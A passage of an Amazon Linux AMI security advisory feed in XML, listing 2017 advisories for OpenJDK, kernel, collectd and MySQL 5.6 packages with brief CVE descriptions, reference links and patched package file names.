</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5542" title="" id="CVE-2016-5542" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3509" title="" id="CVE-2017-3509" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3511" title="" id="CVE-2017-3511" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3526" title="" id="CVE-2017-3526" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3533" title="" id="CVE-2017-3533" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3539" title="" id="CVE-2017-3539" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3544" title="" id="CVE-2017-3544" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-javadoc-zip" version="1.8.0.131" release="2.b11.30.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-zip-1.8.0.131-2.b11.30.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.131" release="2.b11.30.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.131-2.b11.30.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.131" release="2.b11.30.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.131-2.b11.30.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.131" release="2.b11.30.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.131-2.b11.30.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.131" release="2.b11.30.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.131-2.b11.30.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.131" release="2.b11.30.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.131-2.b11.30.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.131" release="2.b11.30.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.131-2.b11.30.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.131" release="2.b11.30.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.131-2.b11.30.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.131" release="2.b11.30.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.131-2.b11.30.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.131" release="2.b11.30.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.131-2.b11.30.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.131" release="2.b11.30.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.131-2.b11.30.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.131" release="2.b11.30.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.131-2.b11.30.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.131" release="2.b11.30.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.131-2.b11.30.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.131" release="2.b11.30.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.131-2.b11.30.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-828</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-828: important priority package update for kernel</title><issued date="2017-05-10 17:06:00" /><updated date="2017-05-10 23:56:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-7618:
A vulnerability was found in crypto/ahash.c in the Linux kernel which allows attackers to cause a denial of service (API operation calling its own callback, and infinite recursion) by triggering EBUSY on a full queue.
1441093:
CVE-2017-7618 kernel: Infinite recursion in ahash.c by triggering EBUSY on a full queue
CVE-2017-7616:
Incorrect error handling in the set_mempolicy() and mbind() compat syscalls in &#039;mm/mempolicy.c&#039; in the Linux kernel allows local users to obtain sensitive information from uninitialized stack data by triggering failure of a certain bitmap operation.
1441088:
CVE-2017-7616 kernel: Incorrect error handling in the set_mempolicy and mbind compat syscalls in mm/mempolicy.c
CVE-2017-7308:
It was found that the packet_set_ring() function of the Linux kernel&#039;s networking implementation did not properly validate certain block-size data. A local attacker with CAP_NET_RAW capability could use this flaw to trigger a buffer overflow, resulting in the crash of the system. Due to the nature of the flaw, privilege escalation cannot be fully ruled out, although we believe it is unlikely.
1437404:
CVE-2017-7308 kernel: net/packet: overflow in check for priv area size
CVE-2017-7187:
The sg_ioctl function in drivers/scsi/sg.c in the Linux kernel allows local users to cause a denial of service (stack-based buffer overflow) or possibly have unspecified other impacts via a large command size in an SG_NEXT_CMD_LEN ioctl call, leading to out-of-bounds write access in the sg_write function.
1434327:
CVE-2017-7187 kernel: scsi: Stack-based buffer overflow in sg_ioctl function
CVE-2017-5967:
The time subsystem in the Linux kernel, when CONFIG_TIMER_STATS is enabled, allows local users to discover real PID values (as distinguished from PID values inside a PID namespace) by reading the /proc/timer_list file, related to the print_timer function in kernel/time/timer_list.c and the __timer_stats_timer_set_start_info function in kernel/time/timer.c.
1422138:
CVE-2017-5967 kernel: Time subsystem allows local users to discover real PID values
CVE-2017-2671:
A race condition leading to a NULL pointer dereference was found in the Linux kernel&#039;s Link Layer Control implementation. A local attacker with access to ping sockets could use this flaw to crash the system.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2671" title="" id="CVE-2017-2671" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5967" title="" id="CVE-2017-5967" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7187" title="" id="CVE-2017-7187" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7308" title="" id="CVE-2017-7308" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7616" title="" id="CVE-2017-7616" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7618" title="" id="CVE-2017-7618" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools-debuginfo" version="4.9.27" release="14.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.9.27-14.31.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.9.27" release="14.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.9.27-14.31.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.9.27" release="14.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.9.27-14.31.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.9.27" release="14.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.9.27-14.31.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.9.27" release="14.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.9.27-14.31.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.9.27" release="14.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.9.27-14.31.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.9.27" release="14.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.9.27-14.31.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.9.27" release="14.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.9.27-14.31.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.9.27" release="14.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.9.27-14.31.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.9.27" release="14.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.9.27-14.31.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.9.27" release="14.31.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.9.27-14.31.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.9.27" release="14.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.9.27-14.31.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.9.27" release="14.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.9.27-14.31.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.9.27" release="14.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.9.27-14.31.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.9.27" release="14.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.9.27-14.31.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.9.27" release="14.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.9.27-14.31.amzn1.i686.rpm</filename></package><package name="kernel" version="4.9.27" release="14.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.9.27-14.31.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.9.27" release="14.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.9.27-14.31.amzn1.i686.rpm</filename></package><package name="perf" version="4.9.27" release="14.31.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.9.27-14.31.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.27" release="14.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.9.27-14.31.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.9.27" release="14.31.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.9.27-14.31.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-829</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-829: medium priority package update for collectd</title><issued date="2017-05-18 18:58:00" /><updated date="2017-05-19 03:37:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-7401:
collectd contains an infinite loop due to how the parse_packet() and parse_part_sign_sha256() functions interact. If an instance of collectd is configured with &quot;SecurityLevel None&quot; and with empty &quot;AuthFile&quot; options an attacker can send crafted UDP packets that trigger the infinite loop, causing a denial of service.
1439674:
CVE-2017-7401 collectd: Infinite loop due to incorrect interaction of parse_packet() and parse_part_sign_sha256() functions
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7401" title="" id="CVE-2017-7401" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="collectd-memcachec" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-memcachec-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-curl_xml" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-curl_xml-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-bind" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-bind-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-lua" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-lua-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-java" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-java-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-snmp" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-snmp-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-write_sensu" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-write_sensu-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-dns" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-dns-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="libcollectdclient" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcollectdclient-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-apache" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-apache-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-ipmi" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-ipmi-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-lvm" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-lvm-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-chrony" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-chrony-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-mysql" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-mysql-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-nginx" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-nginx-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-netlink" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-netlink-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-varnish" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-varnish-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-amqp" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-amqp-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-iptables" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-iptables-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="perl-Collectd" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Collectd-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-drbd" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-drbd-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-python" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-python-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-generic-jmx" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-generic-jmx-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-email" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-email-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-postgresql" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-postgresql-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-write_http" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-write_http-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-web" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-web-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-debuginfo" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-debuginfo-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-dbi" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-dbi-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-openldap" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-openldap-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-rrdcached" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-rrdcached-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-notify_email" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-notify_email-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="libcollectdclient-devel" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcollectdclient-devel-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-zookeeper" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-zookeeper-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-rrdtool" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-rrdtool-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-utils" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-utils-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-write_tsdb" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-write_tsdb-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-curl" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-curl-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-ipvs" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-ipvs-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-hugepages" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-hugepages-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-gmond" version="5.7.1" release="3.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-gmond-5.7.1-3.18.amzn1.x86_64.rpm</filename></package><package name="collectd-rrdtool" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-rrdtool-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-memcachec" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-memcachec-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-rrdcached" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-rrdcached-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-curl_xml" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-curl_xml-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-hugepages" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-hugepages-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-python" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-python-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="libcollectdclient" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/libcollectdclient-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-chrony" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-chrony-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-gmond" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-gmond-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-email" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-email-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-netlink" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-netlink-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-generic-jmx" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-generic-jmx-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-write_http" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-write_http-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-postgresql" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-postgresql-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-amqp" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-amqp-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-zookeeper" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-zookeeper-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-dns" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-dns-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-apache" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-apache-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-dbi" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-dbi-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-lvm" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-lvm-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-web" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-web-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-bind" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-bind-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-java" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-java-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-varnish" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-varnish-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-iptables" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-iptables-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-debuginfo" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-debuginfo-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-write_sensu" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-write_sensu-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-write_tsdb" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-write_tsdb-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-snmp" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-snmp-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-utils" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-utils-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-ipmi" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-ipmi-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-curl" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-curl-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-drbd" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-drbd-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="libcollectdclient-devel" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/libcollectdclient-devel-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-nginx" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-nginx-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-notify_email" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-notify_email-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-mysql" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-mysql-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="perl-Collectd" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/perl-Collectd-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-lua" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-lua-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-ipvs" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-ipvs-5.7.1-3.18.amzn1.i686.rpm</filename></package><package name="collectd-openldap" version="5.7.1" release="3.18.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-openldap-5.7.1-3.18.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-830</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-830: important priority package update for mysql56</title><issued date="2017-05-18 22:01:00" /><updated date="2017-05-19 03:44:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-3599:
An integer overflow flaw leading to a buffer overflow was found in the way MySQL parsed connection handshake packets. An unauthenticated remote attacker with access to the MySQL port could use this flaw to crash the mysqld daemon.
1443386:
CVE-2017-3599 mysql: integer underflow in get_56_lenc_string() leading to DoS (CPU Apr 2017)
CVE-2017-3464:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DDL). Supported versions that are affected are 5.5.54 and earlier, 5.6.35 and earlier and 5.7.17 and earlier. Easily &quot;exploitable&quot; vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 4.3 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N).
1443379:
CVE-2017-3464 mysql: Server: DDL unspecified vulnerability (CPU Apr 2017)
CVE-2017-3463:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Security: Privileges). Supported versions that are affected are 5.5.54 and earlier, 5.6.35 and earlier and 5.7.17 and earlier. Easily &quot;exploitable&quot; vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1443378:
CVE-2017-3463 mysql: Server: Security: Privileges unspecified vulnerability (CPU Apr 2017)
CVE-2017-3462:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Security: Privileges). Supported versions that are affected are 5.5.54 and earlier, 5.6.35 and earlier and 5.7.17 and earlier. Easily &quot;exploitable&quot; vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1443377:
CVE-2017-3462 mysql: Server: Security: Privileges unspecified vulnerability (CPU Apr 2017)
CVE-2017-3461:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Security: Privileges). Supported versions that are affected are 5.5.54 and earlier, 5.6.35 and earlier and 5.7.17 and earlier. Easily &quot;exploitable&quot; vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1443376:
CVE-2017-3461 mysql: Server: Security: Privileges unspecified vulnerability (CPU Apr 2017)
CVE-2017-3456:
